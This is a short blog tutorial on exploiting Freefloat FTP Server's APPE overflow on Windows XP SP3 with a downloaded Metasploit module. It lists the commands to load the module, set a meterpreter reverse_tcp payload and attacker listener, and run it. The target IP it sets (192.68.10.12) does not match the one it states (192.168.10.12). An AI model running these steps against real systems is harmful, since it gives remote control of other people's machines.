Linux

Freefloat FTP Server APPE Command Overflow in Metasploit

The Freefloat FTP Server APPE Command Overflow is not a 0-day exploit but lemme just share to you a Metasploit Module made by SecPod.

In order to run the module we need to download the ruby script first and put it in this directory : /opt/framework/msf3/modules/exploits/windows/ftp

wget http://secpod.org/msf/freefloat_ftp_apee_cmd.rb

For those of you who don’t know, this kind of exploit works on a Windows XP SP3 that has a Freefloat FTP server. It exploits the “validation errors while processing DELE,MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands“.  If the exploit is successful, it allows the remote attacker to execute arbitrary code or may cause a dos attack.

portscanning

Alright, fire up metasploit (msfconsole) and use this exploit:

use exploit/windows/ftp/freefloat_ftp_apee_cmd

To know more about this exploit you may type, info <exploitname>.

freefloat_ftp_apee_cmd.rb

Set the payload:

set payload windows/meterpreter/reverse_tcp

Assuming we have a Freefloat FTP Server on a Windows XP SP3 and its IP is 192.168.10.12, thus we need to set the RHOST to the IP it is assigned to.

set rhost 192.68.10.12

Then set the attacker host, mine is 192.168.10.4

set lhost 192.168.10.4

Then to assign a port that handles the payload, you may set by typing:

set lport <port>  (For example: set lport 445)

It’s up to you if you want to change the listening address but the default port is 4444. So if all settings are done, then you may run the command exploit.

exploit freefloat Metasploit

 

If you are new to metasploit then you might want to read my Metasploit Basics article.

Leave a Reply